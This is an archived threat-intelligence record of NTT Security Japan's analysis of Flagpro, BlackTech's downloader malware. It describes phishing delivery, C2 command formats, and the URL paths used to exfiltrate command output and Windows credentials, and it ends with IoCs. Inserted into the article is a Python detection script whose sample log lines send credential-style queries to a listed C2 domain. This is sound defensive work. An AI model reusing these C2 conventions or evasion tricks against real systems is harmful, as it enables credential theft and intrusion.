{
	"id": "7d0a0b3e-24f1-4b8e-a168-338f0419982b",
	"created_at": "2026-04-06T00:11:19.196199Z",
	"updated_at": "2026-04-10T03:32:09.446769Z",
	"deleted_at": null,
	"sha1_hash": "c759a2089f71dd4809d180f16bff0115e96477ea",
	"title": "Flagpro: The new malware used by BlackTech",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 285742,
	"plain_text": "Flagpro: The new malware used by BlackTech\r\nBy NTTセキュリティ・ジャパン株式会社 (NTT Security Japan)\r\nPublished: 2021-12-28 · Archived: 2026-04-05 18:31:44 UTC\r\nBy Hiroki Hada\r\nPublished December 28, 2021 | Japanese\r\nThis article is a translation of \"標的型攻撃グループBlackTechが使用するマルウェアFlagproについて\" (On Flagpro, the malware used by the targeted-attack group BlackTech).\r\n---\r\nIntroduction\r\nBlackTech has been attacking actively, and several attack cases against Japanese companies have been observed. BlackTech uses a new malware in these cases; we call it “Flagpro”. This article shares an overview of Flagpro, a timeline, and detailed analysis results.\r\nAttack overview\r\nFlagpro is used in the initial stage of an attack to investigate the target’s environment and to download and execute a second-stage malware. An attack case using Flagpro starts with a spear-phishing e-mail. The message is tailored to the target organization and disguised as e-mail correspondence with one of the target’s business partners, which means the attackers researched their target before attacking.\r\nThe attackers attach a password-protected archive (ZIP or RAR) to the e-mail and write its password in the message body. The archive contains an xlsm file with a malicious macro; if the user enables the macro, the malware is dropped. The contents of the xlsm file are also tailored to the target, so the recipient has little reason to find the file suspicious.\r\nWhen the macro runs, it creates an EXE file in the Startup directory. This EXE file is Flagpro. In most cases the created file is named “dwm.exe”. The next time the system starts, Flagpro, placed in the Startup directory as “dwm.exe”, is executed.\r\nFlagpro communicates with a C\u0026C server and either receives commands from the server to execute, or downloads a second-stage malware and then executes it.
The attackers check whether the target’s environment is suitable for running the second-stage malware. If they decide to proceed with the attack, another malware sample is downloaded and executed.\r\nTimeline\r\nWe have observed attack cases using Flagpro against multiple companies (defense, media, communications) on several occasions. In October 2020, a sample related to Flagpro was submitted to an online service, so Flagpro may already have been used in attacks at that point.\r\nhttps://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech\r\nPage 1 of 6\n\nFlagpro functions\r\nIn July 2021, our SOC observed a new Flagpro sample implemented with the MFC (Microsoft Foundation Class) library; MFC had not been used in the older Flagpro. This sample contains classes such as “CV20_LoaderApp” and “CV20_LoaderDlg”. From these class names we assume that Flagpro’s role is that of a downloader and that the sample version is 2.0.\r\nIn this article we call the MFC-based sample “Flagpro v2.0” and the older one “Flagpro v1.0”.\r\nFlagpro’s main functions are the following:\r\nDownload and execute a tool\r\nExecute OS commands and send the results\r\nCollect and send Windows authentication information\r\nIn Flagpro v2.0 these commands are implemented in a member function of the CV20_LoaderApp class.\r\nOnce launched, Flagpro communicates with the C\u0026C server and executes the received commands listed above; after the designated interval it repeats this behavior.\r\nWhen downloading and executing a tool, Flagpro first stores the downloaded file at “%Temp%\\~MY[0-9A-F].tmp”, then appends the extension “.exe” to the stored file’s name and executes it.\r\nIn Flagpro v1.0, if a dialog titled “Windows セキュリティ” (the Japanese-locale title of the “Windows Security” dialog) is displayed when Flagpro accesses an external site, Flagpro automatically clicks the OK button to close the dialog.
This handling also works when the dialog title is in Chinese or English, which suggests the targets are Japan, Taiwan and English-speaking countries. As an additional feature, Flagpro v2.0 checks whether both the username and the password are filled in the dialog before clicking the OK button.\r\nFlagpro v2.0 has another new function. If a dialog titled “Internet Explorer [7-11]” (the number after “Internet Explorer” depends on the version the user uses) is displayed when Flagpro accesses an external site, Flagpro sends a WM_CLOSE message to close the dialog.\r\nWe assume that these functions, which close dialogs automatically, are implemented to reduce the risk that a user notices an external connection made by Flagpro.\r\nIn Flagpro v2.0, the same code shown in the figure below is inserted repeatedly to hide the important processing, as a simple obfuscation technique:\r\nReceived commands\r\nThe commands received from the C\u0026C server are Base64-encoded. The following is the format of a decoded Flagpro v2.0 command:\r\nA Download Command field consists of two flags (Exec and Yes) and a URL path, as follows:\r\nThe first string, “Exec”, is the action flag. If it is absent from both Download Command fields of the command, Flagpro does not run its main processing (downloading, executing OS commands, collecting authentication information, and so on). The next string, “Yes”, is the execution flag. If a Download Command field contains “ExecYes”, Flagpro downloads and executes the file; if the command is “Exec/malware.html”, as in the image above, Flagpro only downloads the file.\r\nThe Time Interval field is the waiting time before the next command.
The unit is milliseconds.\r\nThe following image shows an actual example of the received commands:\r\nCommunications with the C\u0026C server\r\nBoth Flagpro v1.0 and v2.0 handle connections to the C\u0026C server through Internet Explorer COM objects, and Flagpro communicates with the C\u0026C server over HTTP.\r\nWhen requesting commands, sending the results of OS command execution, or sending collected authentication information, Flagpro accesses the C\u0026C server with specific URL paths and queries. It Base64-encodes the data before sending it to the C\u0026C server. The following table shows the relationship between Flagpro’s activities and the URL paths and queries.\r\nRelated activity | URL path and query\r\nRequest command | /index.html\r\nSend result of OS command execution | /index.htmld?flag=[Encoded Data]\r\nSend authentication information | /index.htmld?flagpro=[Encoded Data]\r\nWhen Flagpro downloads a tool there is no specific URL path, because the file name on the server is used.\r\nThe following image shows traffic when Flagpro v2.0 connects to a C\u0026C server:\r\nAs of July 2021 we do not know why, but we observed the response “Hello Boy!” from the C\u0026C server when accessing arbitrary paths other than those shown in the table above. The following image is an example of the response:\r\nDetections\r\nTo detect attacks using Flagpro, it is effective to create and deploy custom signatures on both network and endpoint devices. For network detection, Flagpro’s characteristic URL paths, such as index.htmld?flag=[Base64 string] and index.htmld?flagpro=[Base64 string], are useful.\r\nFor endpoint detection, the naming rules of the temporary files Flagpro creates, such as %TEMP%\\~MY[0-9A-F].tmp and %TEMP%\\~MY[0-9A-F].tmp.exe, are effective.
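The following Python is an added example (not NTT's or Flagpro's own code) that models both sides of the C2 exchange described in the Received commands and Communications sections and turns the Detections indicators into checks: it decodes a polled command into the actions Flagpro would take, classifies client requests by URL path and decodes the Base64 payload of flag= and flagpro= queries, and matches the ~MY[0-9A-F].tmp naming rule. The separator between the fields of the decoded command is not given in this text (it was in a figure), so the '|' separator and the field order used here are hypothetical; the log lines and the command are constructed, the host is taken from the IoC list, and the temp-name pattern is widened to up to four hex digits as an assumption.

```python
import base64
import binascii
import ntpath
import re
from urllib.parse import urlsplit

# Added example, not NTT's or Flagpro's code. The decoded command layout
# field1 SEP field2 SEP interval and the '|' separator are hypothetical:
# the text only documents the two Download Command fields and the interval.
HYPOTHETICAL_FIELD_SEP = '|'

# ---- server -> client: the polled command ---------------------------------
def parse_download_field(field):
    '''Split one Download Command field into (has_exec, has_yes, url_path).
    'Exec' is the action flag, 'Yes' the execution flag; what follows the
    flags is the URL path of the file to fetch.'''
    if not field.startswith('Exec'):
        return (False, False, field)
    rest = field[4:]
    if rest.startswith('Yes'):
        return (True, True, rest[3:])
    return (True, False, rest)

def parse_command(b64_text):
    '''Decode a polled command and return what Flagpro would do with it:
    {'actions': [(kind, path), ...], 'sleep_ms': n}, or None if malformed.'''
    try:
        decoded = base64.b64decode(b64_text, validate=True).decode('ascii')
    except (binascii.Error, UnicodeDecodeError):
        return None
    parts = decoded.split(HYPOTHETICAL_FIELD_SEP)
    if len(parts) != 3 or not parts[2].isdigit():
        return None
    fields = [parse_download_field(parts[0]), parse_download_field(parts[1])]
    # No Exec flag in either field: Flagpro skips its main processing entirely.
    if not any(f[0] for f in fields):
        return {'actions': [], 'sleep_ms': int(parts[2])}
    actions = []
    for has_exec, has_yes, path in fields:
        if has_exec:
            actions.append(('download+execute' if has_yes else 'download', path))
    return {'actions': actions, 'sleep_ms': int(parts[2])}

# ---- client -> server: the requests a network sensor sees -----------------
RESULT_KEYS = {'flag': 'os-command-result', 'flagpro': 'credentials'}

def classify_request(url):
    '''Map a request URL to a Flagpro activity and decode its Base64 payload.
    Returns (activity, payload_or_None), or None for URLs that do not match.
    The query value is taken verbatim (no form decoding) so that '+' and '/'
    from the standard Base64 alphabet survive.'''
    parts = urlsplit(url)
    if parts.path == '/index.html' and not parts.query:
        return ('command-request', None)
    if parts.path != '/index.htmld':
        return None
    key, sep, value = parts.query.partition('=')
    if not sep or key not in RESULT_KEYS:
        return None
    try:
        payload = base64.b64decode(value, validate=True).decode('utf-8', 'replace')
    except (binascii.Error, ValueError):
        payload = None  # path matches but the payload is not valid Base64
    return (RESULT_KEYS[key], payload)

def scan_proxy_log(lines):
    '''Return [(line_no, activity, payload)] for lines of the constructed
    shape METHOD URL STATUS that match Flagpro traffic.'''
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) >= 2:
            result = classify_request(fields[1])
            if result:
                hits.append((n, result[0], result[1]))
    return hits

# ---- endpoint: the temporary file the downloaded tool lands in ------------
# The report writes the name as ~MY[0-9A-F].tmp (then .tmp.exe); this pattern
# allows up to four hex digits (an assumption) and uses [.] for a literal dot.
TEMP_NAME_RE = re.compile(r'^~MY[0-9A-F]{1,4}[.]tmp([.]exe)?$', re.IGNORECASE)

def is_flagpro_temp_name(path):
    return TEMP_NAME_RE.match(ntpath.basename(path)) is not None

# Constructed sample data: the host comes from the IoC list, the lines are made up.
def b64(s):
    return base64.b64encode(s.encode()).decode()

SAMPLE_COMMAND = b64(HYPOTHETICAL_FIELD_SEP.join(['Exec/malware.html', 'ExecYes/stage2.html', '60000']))
SAMPLE_LOG = [
    'GET http://update.centosupdates.com/index.html 200',
    'GET http://update.centosupdates.com/images/logo.png 200',
    'GET http://update.centosupdates.com/index.htmld?flag=' + b64('OS Name: Microsoft Windows 10') + ' 200',
    'GET http://update.centosupdates.com/index.htmld?flagpro=not%base64 200',
]

if __name__ == '__main__':
    print(parse_command(SAMPLE_COMMAND))
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
    print(is_flagpro_temp_name('C:/Users/alice/AppData/Local/Temp/~MY7F.tmp.exe'))
```

Run as a script it prints the planned actions for the sample command, the three matching log lines (the fourth sample is benign) and the temp-name check. The query value is decoded verbatim rather than through parse_qs because form decoding would turn a '+' in standard Base64 into a space and corrupt the payload; when the payload fails to decode, the path match is still reported so the sensor does not go quiet on a variant that changes the encoding.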
In addition, the reconnaissance commands Flagpro runs after establishing the connection with the C\u0026C server, like the following, are also useful for detection. The following commands are some of the examples:\r\nConclusion\r\nWe have observed attack cases using Flagpro against Japan since October 2020. The attack techniques have not changed much, but BlackTech uses more evasion techniques: for example, they tailor decoy files and file names to their target and carefully check the target’s environment. Recently they have started using other new malware families called “SelfMake Loader” and “Spider RAT”, which shows that they are actively developing new malware. Therefore, attacks by BlackTech warrant close attention.\r\nIoC\r\n54e6ea47eb04634d3e87fd7787e2136ccfbcc80ade34f246a12cf93bab527f6b\r\ne197c583f57e6c560b576278233e3ab050e38aa9424a5d95b172de66f9cfe970\r\n655ca39beb2413803af099879401e6d634942a169d2f57eb30f96154a78b2ad5\r\n840ce62f92fc519cd1a33b62f4b9f92a962b7fb28c12d2f607dec0b520e6a4b2\r\nba27ae12e6f3c2c87fd2478072dfa2747d368a507c69cd90b653c9e707254a1d\r\n77680fb906476f0d84e15d5032f09108fdef8933bcad0b941c9f375fedd0b2c9\r\ne81255ff6e0ed937603748c1442ce9d6588decf6922537037cf3f1a7369a8876\r\n45[.]76.184.227\r\n45[.]32.23.140\r\n139[.]162.87.180\r\n107[.]191.61.40\r\n172[.]104.109.217\r\norg.misecure[.]com\r\nupdate.centosupdates[.]com\r\nSource: https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech"
	],
	"report_names": [
		"flagpro-the-new-malware-used-by-blacktech"
	],
	"threat_actors": [
		{
			"id": "efa7c047-b61c-4598-96d5-e00d01dec96b",
			"created_at": "2022-10-25T16:07:23.404442Z",
			"updated_at": "2026-04-10T02:00:04.584239Z",
			"deleted_at": null,
			"main_name": "BlackTech",
			"aliases": [
				"BlackTech",
				"Canary Typhoon",
				"Circuit Panda",
				"Earth Hundun",
				"G0098",
				"Manga Taurus",
				"Operation PLEAD",
				"Operation Shrouded Crossbow",
				"Operation Waterbear",
				"Palmerworm",
				"Radio Panda",
				"Red Djinn",
				"T-APT-03",
				"TEMP.Overboard"
			],
			"source_name": "ETDA:BlackTech",
			"tools": [
				"BIFROST",
				"BUSYICE",
				"BendyBear",
				"Bluether",
				"CAPGELD",
				"DRIGO",
				"Deuterbear",
				"Flagpro",
				"GOODTIMES",
				"Gh0stTimes",
				"IconDown",
				"KIVARS",
				"LOLBAS",
				"LOLBins",
				"Linopid",
				"Living off the Land",
				"TSCookie",
				"Waterbear",
				"XBOW",
				"elf.bifrose"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2646f776-792a-4498-967b-ec0d3498fdf1",
			"created_at": "2022-10-25T15:50:23.475784Z",
			"updated_at": "2026-04-10T02:00:05.269591Z",
			"deleted_at": null,
			"main_name": "BlackTech",
			"aliases": [
				"BlackTech",
				"Palmerworm"
			],
			"source_name": "MITRE:BlackTech",
			"tools": [
				"Kivars",
				"PsExec",
				"TSCookie",
				"Flagpro",
				"Waterbear"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "75024aad-424b-449a-b286-352fe9226bcb",
			"created_at": "2023-01-06T13:46:38.962724Z",
			"updated_at": "2026-04-10T02:00:03.164536Z",
			"deleted_at": null,
			"main_name": "BlackTech",
			"aliases": [
				"CIRCUIT PANDA",
				"Temp.Overboard",
				"Palmerworm",
				"G0098",
				"T-APT-03",
				"Manga Taurus",
				"Earth Hundun",
				"Mobwork",
				"HUAPI",
				"Red Djinn",
				"Canary Typhoon"
			],
			"source_name": "MISPGALAXY:BlackTech",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3b93ef3c-2baf-429e-9ccc-fb80d0046c3b",
			"created_at": "2025-08-07T02:03:24.569066Z",
			"updated_at": "2026-04-10T02:00:03.730864Z",
			"deleted_at": null,
			"main_name": "BRONZE CANAL",
			"aliases": [
				"BlackTech",
				"CTG-6177",
				"Circuit Panda",
				"Earth Hundun",
				"Palmerworm",
				"Red Djinn",
				"Shrouded Crossbow"
			],
			"source_name": "Secureworks:BRONZE CANAL",
			"tools": [
				"Bifrose",
				"DRIGO",
				"Deuterbear",
				"Flagpro",
				"Gh0stTimes",
				"KIVARS",
				"PLEAD",
				"Spiderpig",
				"Waterbear",
				"XBOW"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434279,
	"ts_updated_at": 1775791929,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c759a2089f71dd4809d180f16bff0115e96477ea.pdf",
		"text": "https://archive.orkl.eu/c759a2089f71dd4809d180f16bff0115e96477ea.txt",
		"img": "https://archive.orkl.eu/c759a2089f71dd4809d180f16bff0115e96477ea.jpg"
	}
}